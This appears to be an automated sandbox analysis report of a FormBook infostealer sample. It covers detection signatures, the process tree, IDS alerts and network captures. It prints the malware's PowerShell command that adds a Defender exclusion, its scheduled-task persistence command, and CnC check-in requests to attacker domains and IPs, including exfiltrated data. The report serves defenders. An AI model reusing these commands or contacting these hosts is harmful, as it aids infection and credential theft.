Windows Analysis Report
C6Abn5cBei.exe

Overview

General Information

Sample name: C6Abn5cBei.exe (renamed because original name is a hash value)
Original sample name: 65990a23e7f833be5f9a90b3a50dc246ec89ffdb4bcc1895c5fe4917438483ce.exe
Analysis ID: 1588774
MD5: 3f10d9ae24f018b0ca90a3f5b4365c48
SHA1: d19111d80986035ecd143bc04d0a46b600aa3e4b
SHA256: 65990a23e7f833be5f9a90b3a50dc246ec89ffdb4bcc1895c5fe4917438483ce
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • C6Abn5cBei.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\C6Abn5cBei.exe" MD5: 3F10D9AE24F018B0CA90A3F5B4365C48)
    • powershell.exe (PID: 3572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1292 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6508 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • C6Abn5cBei.exe (PID: 5084 cmdline: "C:\Users\user\Desktop\C6Abn5cBei.exe" MD5: 3F10D9AE24F018B0CA90A3F5B4365C48)
      • mDeEygzSIDmBTP.exe (PID: 6856 cmdline: "C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 4832 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • mDeEygzSIDmBTP.exe (PID: 5124 cmdline: "C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6752 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • zdDlscHlw.exe (PID: 2884 cmdline: C:\Users\user\AppData\Roaming\zdDlscHlw.exe MD5: 3F10D9AE24F018B0CA90A3F5B4365C48)
    • schtasks.exe (PID: 7080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • zdDlscHlw.exe (PID: 6344 cmdline: "C:\Users\user\AppData\Roaming\zdDlscHlw.exe" MD5: 3F10D9AE24F018B0CA90A3F5B4365C48)
  • cleanup
No configs have been found
Yara matches (memory dumps):
Source | Rule | Description | Author | Strings
00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Yara matches (unpacked PEs):
Source | Rule | Description | Author | Strings
9.2.C6Abn5cBei.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.C6Abn5cBei.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", ProcessId: 3572, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", ProcessId: 3572, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\zdDlscHlw.exe, ParentImage: C:\Users\user\AppData\Roaming\zdDlscHlw.exe, ParentProcessId: 2884, ParentProcessName: zdDlscHlw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp", ProcessId: 7080, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", ProcessId: 6508, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe", ProcessId: 3572, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\C6Abn5cBei.exe", ParentImage: C:\Users\user\Desktop\C6Abn5cBei.exe, ParentProcessId: 2916, ParentProcessName: C6Abn5cBei.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp", ProcessId: 6508, ProcessName: schtasks.exe

Suricata IDS alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:21:51.967852+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 172.67.145.234 | 80 | TCP
2025-01-11T05:22:36.706516+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49744 | 43.199.54.158 | 80 | TCP
2025-01-11T05:22:50.301222+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49955 | 154.88.22.107 | 80 | TCP
2025-01-11T05:23:05.129591+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49991 | 154.23.184.95 | 80 | TCP

Suricata IDS alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:22:08.786803+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 43.199.54.158 | 80 | TCP
2025-01-11T05:22:11.567999+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49714 | 43.199.54.158 | 80 | TCP
2025-01-11T05:22:14.318121+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49727 | 43.199.54.158 | 80 | TCP
2025-01-11T05:22:42.651153+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49906 | 154.88.22.107 | 80 | TCP
2025-01-11T05:22:45.210232+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49924 | 154.88.22.107 | 80 | TCP
2025-01-11T05:22:47.764735+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49937 | 154.88.22.107 | 80 | TCP
2025-01-11T05:22:56.825316+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49988 | 154.23.184.95 | 80 | TCP
2025-01-11T05:22:59.498294+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49989 | 154.23.184.95 | 80 | TCP
2025-01-11T05:23:02.595856+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49990 | 154.23.184.95 | 80 | TCP

Suricata IDS alerts, SID 2856318 (ETPRO MALWARE FormBook CnC Checkin (POST) M4):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:22:08.786803+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 43.199.54.158 | 80 | TCP

AV Detection

Source: C6Abn5cBei.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe, Avira: detection malicious, Label: HEUR/AGEN.1309499
Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe, ReversingLabs: Detection: 63%
Source: C6Abn5cBei.exe, ReversingLabs: Detection: 63%
Source: C6Abn5cBei.exe, Virustotal: Detection: 65%
Source: Yara match, File source: 9.2.C6Abn5cBei.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.C6Abn5cBei.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe, Joe Sandbox ML: detected
Source: C6Abn5cBei.exe, Joe Sandbox ML: detected
Source: C6Abn5cBei.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C6Abn5cBei.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vpxg.pdb source: C6Abn5cBei.exe, zdDlscHlw.exe.0.dr
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mDeEygzSIDmBTP.exe, 00000010.00000000.1799904534.00000000008DE000.00000002.00000001.01000000.0000000D.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000002.2687661742.00000000008DE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: C6Abn5cBei.exe, 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003960000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1874104293.000000000360E000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1877107030.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: C6Abn5cBei.exe, C6Abn5cBei.exe, 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003960000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1874104293.000000000360E000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1877107030.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: regini.pdbGCTL source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2687716808.0000000001578000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vpxg.pdbSHA256 source: C6Abn5cBei.exe, zdDlscHlw.exe.0.dr
Source: Binary string: regini.pdb source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2687716808.0000000001578000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 43.199.54.158:80
Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.8:49713 -> 43.199.54.158:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49712 -> 172.67.145.234:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49906 -> 154.88.22.107:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 43.199.54.158:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 43.199.54.158:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49937 -> 154.88.22.107:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49955 -> 154.88.22.107:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49990 -> 154.23.184.95:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49744 -> 43.199.54.158:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49924 -> 154.88.22.107:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49989 -> 154.23.184.95:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49988 -> 154.23.184.95:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49991 -> 154.23.184.95:80
Source: Joe Sandbox View, IP Address: 172.67.145.234
Source: Joe Sandbox View, ASN Name: CNSERVERSUS
Source: Joe Sandbox View, ASN Name: COGENT-174US
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
    GET /7nvw/?avRhn=bbdDITTjVn5ZxI6GN1reGwP2o2vtBS0PP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229iZLjgC+IdiuBJhC/u8wioHnAK20zfUoQLw8DCuNy8wJow==&fjo=vjgP0XDx HTTP/1.1
    Host: www.vayui.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Source: global traffic, HTTP traffic detected:
    GET /iodk/?avRhn=dmGO6CepyY0nvsEd+06VKI64gib0AW2YSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zXJSWm+a/FKDEmKpBMgLDWMch8H+yCAXb5nRSFJrzKqcGg==&fjo=vjgP0XDx HTTP/1.1
    Host: www.327531.buzz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Source: global traffic, HTTP traffic detected:
    GET /63n1/?fjo=vjgP0XDx&avRhn=wxKP0Ki1Kkw6YH7/nhrbl3WDemgIBFZSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAstOOZytUbFrdg7631H3C/N1OxVxb3rHD3zi4wEM6AspOKA== HTTP/1.1
    Host: www.cg19g5.pro
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Source: global traffic, HTTP traffic detected:
    GET /ebw6/?avRhn=g7KNPNtXo04gJA8a0AickIpMAuCVSKId0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCZ/YcP8NJRKC5us+1o1KLAKIeLhdJLJPk6Ry+qmxzeVySw==&fjo=vjgP0XDx HTTP/1.1
    Host: www.hm35s.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Source: global traffic, DNS traffic detected: DNS query: www.vayui.top
Source: global traffic, DNS traffic detected: DNS query: www.327531.buzz
Source: global traffic, DNS traffic detected: DNS query: www.cg19g5.pro
Source: global traffic, DNS traffic detected: DNS query: www.hm35s.top
Source: unknown, HTTP traffic detected:
    POST /iodk/ HTTP/1.1
    Host: www.327531.buzz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Origin: http://www.327531.buzz
    Referer: http://www.327531.buzz/iodk/
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    Content-Length: 206
    Connection: close
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
    Data Raw: 61 76 52 68 6e 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 75 6f 34 51 69 45 6e 68 59 75 32 49 69 79 53 33 59 47 69 2f 56 55 67 69 39 58 4e 66 6d 70 63 43 59 67 4e 32 67 4a 55 72 4f 54 35 4d 39 43 73 64 58 55 64 64 57 45 38 4f 54 74 44 35 38 43 76 41 2f 56 2b 32 6d 57 33 6b 75 6b 63 72 56 43 71 57 77 67 43 35 5a 6c 43 58 41 38 5a 4e 4f 57 6b 67 6b 6f 2f 51 34 54 63 58 66 62 61 44 61 32 46 47 38 4f 76 77 56 74 77 50 70 67 4b 46 2b 4a 69 51 2b 50 54 77 2f 4d 32 79 61 73 39 61 46 4b 37 74 2b 52 6a 4a 5a 45 6b 31 2b 66 55 33 4a 30 30 61 44 39 6f 4d 7a 33 54 69 57 39 6f 62 2f 76 7a 53 41 37 53 44 4d 76 61 65 4b 45 34 3d
    Data Ascii: avRhn=Qkuu51bm+JJ2uo4QiEnhYu2IiyS3YGi/VUgi9XNfmpcCYgN2gJUrOT5M9CsdXUddWE8OTtD58CvA/V+2mW3kukcrVCqWwgC5ZlCXA8ZNOWkgko/Q4TcXfbaDa2FG8OvwVtwPpgKF+JiQ+PTw/M2yas9aFK7t+RjJZEk1+fU3J00aD9oMz3TiW9ob/vzSA7SDMvaeKE4=
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Sat, 11 Jan 2025 04:21:51 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMkFGydQEVcX%2FI72bpSlfhYmwMFAukZfdDVw01szeT4gepTsJezfmdSYCBPb%2Bw1NbyF%2FU8ciYdQ9pFM7%2BstEiHLAFqGEJAfnXlUALxS8VRsAkO%2F2DVsmpZm5iHlKcU05"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90021f568bdc4240-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1557&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
